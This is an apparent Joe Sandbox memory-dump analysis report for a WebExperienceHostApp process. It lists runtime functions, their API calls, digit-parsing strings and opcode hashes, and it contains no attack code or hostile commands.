Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memchr$isdigit$localeconv
String ID: 0$0123456789abcdefABCDEF
API String ID: 1981154758-1185640306
Opcode ID: 47080461fdb72a4bc559756aa2ea0f6e1f8a764b3b904aecea474129a19d88a8
Instruction ID: f450229a1b70744038737b48d25b2652dab816cf5827865f169a0f14a1994e5b
Opcode Fuzzy Hash: 47080461fdb72a4bc559756aa2ea0f6e1f8a764b3b904aecea474129a19d88a8
Instruction Fuzzy Hash: BC917F72B0D5A756E7218B24E430B7A3B90FB4474CF589031DEAA476E9EA7CE906C740

Function 00007FFDFBA61680 Relevance: 12.0, APIs: 5, Strings: 1, Instructions: 1526COMMON

Download Yara Rule

APIs

_Find_elem.LIBCPMT ref: 00007FFDFBA620C5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA62AA9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA62AB0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA62AB7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA62C66

Strings

0123456789-, xrefs: 00007FFDFBA6181A, 00007FFDFBA61A7C, 00007FFDFBA61E77, 00007FFDFBA620D0

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Find_elem
String ID: 0123456789-
API String ID: 2867937686-3850129594
Opcode ID: b14931fd472b40645d27b5a95acc8c6e665534d485ad77f27e7d9b469a2a64a5
Instruction ID: 07a3dad58a6435c34dcfe9cd228fc79b1251fe4971ceedb3b2546cac82912be8
Opcode Fuzzy Hash: b14931fd472b40645d27b5a95acc8c6e665534d485ad77f27e7d9b469a2a64a5
Instruction Fuzzy Hash: AFE28D62B1AB9689EB508F29D460A7D3B62FB44B84F549036DA5E077ECCFBDD841C700

Function 00007FFDFBA62CA0 Relevance: 12.0, APIs: 5, Strings: 1, Instructions: 1526COMMON

Download Yara Rule

APIs

_Find_elem.LIBCPMT ref: 00007FFDFBA636E5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA640C9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA640D0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA640D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA64286

Strings

0123456789-, xrefs: 00007FFDFBA62E3A, 00007FFDFBA6309C, 00007FFDFBA63497, 00007FFDFBA636F0

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Find_elem
String ID: 0123456789-
API String ID: 2867937686-3850129594
Opcode ID: 9a529bd8226e3188403c01f721c91254f1c48c0f7f560601f1bd5291169c5e3b
Instruction ID: 3e0cce621ba6301666464fa54fdcf71cf81236523be6416f3247dc7e2d2d0a02
Opcode Fuzzy Hash: 9a529bd8226e3188403c01f721c91254f1c48c0f7f560601f1bd5291169c5e3b
Instruction Fuzzy Hash: C6E2A062B1AA9689EB508F29D460A7D37B1FB44B84F549031EA5E077F8CFBDD842C700

Function 00007FFDFBA757E0 Relevance: 11.2, APIs: 7, Instructions: 661COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA75A39
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA75AB3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA75B31
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA75FDB

Part of subcall function 00007FFDFBA51DB0: memcpy.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFDFBA4C21C), ref: 00007FFDFBA51E0B
Part of subcall function 00007FFDFBA51DB0: memset.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFDFBA4C21C), ref: 00007FFDFBA51E18

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA76027
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA7606D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA760EC

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpymemset
String ID:
API String ID: 2613654500-0
Opcode ID: b01032cb335723ba4be964af104a56bb7b3906e80541883ba96dbf4a7885703b
Instruction ID: f4422382ec5e1e1caf256763646bd581293d5d9cdd0e3709a6a5f14677781a67
Opcode Fuzzy Hash: b01032cb335723ba4be964af104a56bb7b3906e80541883ba96dbf4a7885703b
Instruction Fuzzy Hash: EE52B222B0DB8686FB108B25E454AAD7362EB94B98F544131DEAD17BEDDF7CE481C340

Function 00007FFDFBA7C7E0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA7C87E
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7CA64
iswdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7CA8D

Strings

0, xrefs: 00007FFDFBA7C848
0123456789abcdefABCDEF, xrefs: 00007FFDFBA7C851, 00007FFDFBA7C8B4
0, xrefs: 00007FFDFBA7C8AE

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: iswdigit$localeconv
String ID: 0$0$0123456789abcdefABCDEF
API String ID: 2634821343-613610638
Opcode ID: 49174df5c4cdc396e0c5235f3f105a11f693802dc7eaefa8f2b40817c63aabed
Instruction ID: 1d0efb97b76bbbc7a796a865a04997a1b893950cbfbe6053d18ea34da7bae587
Opcode Fuzzy Hash: 49174df5c4cdc396e0c5235f3f105a11f693802dc7eaefa8f2b40817c63aabed
Instruction Fuzzy Hash: A1811963F1E55746EB618F24E821A7977A1FB44B48F188031DE9A47AE9FB7CE841C340

Function 00007FFDFBA4A230 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA49DEC: memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49E3A

FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFBA4A2C6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4A38A

Part of subcall function 00007FFDFBA49D70: memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49DB1

FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFBA4A317
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA4A32C

Strings

., xrefs: 00007FFDFBA4A2F3
., xrefs: 00007FFDFBA4A2E4

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Findmemcpy$CloseFileFirst_invalid_parameter_noinfo_noreturnwcscpy_s
String ID: .$.
API String ID: 2624417167-3769392785
Opcode ID: b54155074bf5bdd9a68a963a018a7fba49ecd6018a5380948614d025b80af060
Instruction ID: ade51759cfa0cfcabe18735b659a167b89e5a5495e0ec1a24988f305eb5be4bb
Opcode Fuzzy Hash: b54155074bf5bdd9a68a963a018a7fba49ecd6018a5380948614d025b80af060
Instruction Fuzzy Hash: 4A416432B1A682C5EB509F65E464AA97360FB457A4F504131EBBD076F8EFBCE584C700

Function 00007FFDFBA5E810 Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1354COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA5EFF3
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA5F21D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA5F98B

Strings

0123456789ABCDEFabcdef-+XxPp, xrefs: 00007FFDFBA5E93A, 00007FFDFBA5EDF4, 00007FFDFBA5F151, 00007FFDFBA5F440, 00007FFDFBA5F8C3
$, xrefs: 00007FFDFBA5ECAE

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$localeconv
String ID: $$0123456789ABCDEFabcdef-+XxPp
API String ID: 1825414929-3344005635
Opcode ID: aaa7e4684dea0de9e9086490142b97dde05b5b67a6d3a14f4f169e42f5d3e4e7
Instruction ID: c40059148e4adef4e9d32ab35dfe29623af829349a10cb116474b5825ee4383f
Opcode Fuzzy Hash: aaa7e4684dea0de9e9086490142b97dde05b5b67a6d3a14f4f169e42f5d3e4e7
Instruction Fuzzy Hash: E6D24B76B0AA8785EB508F29D16097C3761FB50B84B949031DB6E077E8CFBEE991D310

Function 00007FFDFBA5D660 Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1354COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA5DE43
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA5E06D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA5E7DB

Strings

$, xrefs: 00007FFDFBA5DAFE
0123456789ABCDEFabcdef-+XxPp, xrefs: 00007FFDFBA5D78A, 00007FFDFBA5DC44, 00007FFDFBA5DFA1, 00007FFDFBA5E290, 00007FFDFBA5E713

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$localeconv
String ID: $$0123456789ABCDEFabcdef-+XxPp
API String ID: 1825414929-3344005635
Opcode ID: 86556c306f232d31921ec4d15b433fc9dda67ad9f9b6300d480a215ede20281a
Instruction ID: e999fa2bb8bd35add677c4b2c6b0dce927f110635202a35a48a09b175bd90714
Opcode Fuzzy Hash: 86556c306f232d31921ec4d15b433fc9dda67ad9f9b6300d480a215ede20281a
Instruction Fuzzy Hash: C9D24976B0AA8785EB508F19D16097C37A1FB50B84B949031DBAE077E8CFBDE991D310

Function 00007FFDFBA5B3A0 Relevance: 10.1, APIs: 4, Strings: 1, Instructions: 1304COMMON

Download Yara Rule

Strings

0123456789-+Ee, xrefs: 00007FFDFBA5B4FD, 00007FFDFBA5B7FD, 00007FFDFBA5BB82, 00007FFDFBA5BEAD, 00007FFDFBA5C401

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID: 0123456789-+Ee
API String ID: 0-1347306980
Opcode ID: a10a18ac66ba2a4b9f7cde72f4e60308c5d3c6f7e0bdff66e84d04cfa45a5f4d
Instruction ID: 11bfa5971f96d1e403c73df27d8acc028c5f19342bafc9def6b7c951a3cd8341
Opcode Fuzzy Hash: a10a18ac66ba2a4b9f7cde72f4e60308c5d3c6f7e0bdff66e84d04cfa45a5f4d
Instruction Fuzzy Hash: A6C26A3AB0AA4789EB508F19D06097D3761FB54F85B948031DA6E07BE8DFBDE991D300

Function 00007FFDFBA5C500 Relevance: 10.1, APIs: 4, Strings: 1, Instructions: 1304COMMON

Download Yara Rule

Strings

0123456789-+Ee, xrefs: 00007FFDFBA5C65D, 00007FFDFBA5C95D, 00007FFDFBA5CCE2, 00007FFDFBA5D00D, 00007FFDFBA5D561

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID:
String ID: 0123456789-+Ee
API String ID: 0-1347306980
Opcode ID: 975c390083cc323f49d0a25d7e2a16abc720d2ccfd826877c86762ac604253f7
Instruction ID: 433f164c6671cb86dee69160f2f3b99325d7fffe63a108df28bd25cb983a339b
Opcode Fuzzy Hash: 975c390083cc323f49d0a25d7e2a16abc720d2ccfd826877c86762ac604253f7
Instruction Fuzzy Hash: EEC26A37B0AA8795EB508F15D06097C3761FB50B88B949031DAAE07BE8DFBDE995D300

Function 00007FFDFBA67714 Relevance: 9.6, APIs: 6, Instructions: 626COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA67987
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA67A19
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA67ABC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA67F78
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA67FCA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA68011

Part of subcall function 00007FFDFBA6F6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFDFBA59A2E), ref: 00007FFDFBA6F728

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID:
API String ID: 3063020102-0
Opcode ID: eebc192cbd0a987a80d3a00d6f6e2cac622f7362e9ae47966162b1b65651f233
Instruction ID: 7bc326aec1b04fd1c554901e5e11fef66358fb2959faba23efa84e030f9f06c0
Opcode Fuzzy Hash: eebc192cbd0a987a80d3a00d6f6e2cac622f7362e9ae47966162b1b65651f233
Instruction Fuzzy Hash: CC527162B19B868AEB108F29D4649BD7362FB44B88F445531DE6D03BE9EF7CD584D300

Function 00007FFDFBA59C50 Relevance: 7.8, APIs: 5, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA59CEE
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA59D01
strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA59D16
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA5A074
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA5A0C2

Part of subcall function 00007FFDFBA6F6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFDFBA59A2E), ref: 00007FFDFBA6F728

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemcpy
String ID:
API String ID: 2354928869-0
Opcode ID: 243aefc0258b0b269433c76fd2b4b90c39a714807ae03ccb53dd7d940baafd4e
Instruction ID: 09736a2fcecdf5058e69e920a7d6eb3bfdc1124907589bf5f731b28f88373dc7
Opcode Fuzzy Hash: 243aefc0258b0b269433c76fd2b4b90c39a714807ae03ccb53dd7d940baafd4e
Instruction Fuzzy Hash: DCE18D22B1AB4699EB10DFA5D4609AC7372FB48B88B504136DE6D17BACDF78D54AC300

Function 00007FFDFBA597A0 Relevance: 7.8, APIs: 5, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA5983E
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA59851
strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA59866
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA59BC4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA59C12

Part of subcall function 00007FFDFBA6F6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFDFBA59A2E), ref: 00007FFDFBA6F728

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemcpy
String ID:
API String ID: 2354928869-0
Opcode ID: 9a6a9a5831d60da9de16aa5e4a4b682bd4daa7348588c6784df99043229ce472
Instruction ID: 37d41205dd040779182447b40835fa60daf766040c1130bebf4928592d8859b4
Opcode Fuzzy Hash: 9a6a9a5831d60da9de16aa5e4a4b682bd4daa7348588c6784df99043229ce472
Instruction Fuzzy Hash: 21E18E22B1AB4689FB00CF65D4609AC7372EB48B88F514136DE6D17BA8DF78D54AD300

Function 00007FFDFBA4E8D0 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 641COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140_APP ref: 00007FFDFBA4EE18
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4F081
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA4F0FB

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00007FFDFBA4E970, 00007FFDFBA4EE38

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memchr
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2740501399-2799312399
Opcode ID: b41d6cc7be76b3909485a6c58d98804c70bedfa68c8fcabdfaa25af99012b850
Instruction ID: 4727e690a8802ae98f6626515dedddb38d468c624f9ea264896372b2168b8212
Opcode Fuzzy Hash: b41d6cc7be76b3909485a6c58d98804c70bedfa68c8fcabdfaa25af99012b850
Instruction Fuzzy Hash: 3B529132B0AA83C9EB598F29C06057D3B61BB41B88B549031DA6E077F9CFBDD556D300

Function 00007FFDFBA65290 Relevance: 5.3, APIs: 3, Instructions: 808COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA78040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFDFBA43832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFDFBA7804F

Part of subcall function 00007FFDFBA92B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45AA8), ref: 00007FFDFBA92B36

Part of subcall function 00007FFDFBA643B0: localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFDFBA5A86C), ref: 00007FFDFBA643F1

_W_Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FF19), ref: 00007FFDFBA65D6B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FF19), ref: 00007FFDFBA65D80
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFDFBA4FF19), ref: 00007FFDFBA65D97

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Gettnames_lock_localeslocaleconvmalloc
String ID:
API String ID: 2855664287-0
Opcode ID: e268c45b8f4311e6bc6082d674872a96692c70c2bb4a740e82dc8fb3dc99b52e
Instruction ID: 55eb7de5f2ddbc74ed890473f981a9644da1c15da0a2b79acc20a6fdc7ebbf09
Opcode Fuzzy Hash: e268c45b8f4311e6bc6082d674872a96692c70c2bb4a740e82dc8fb3dc99b52e
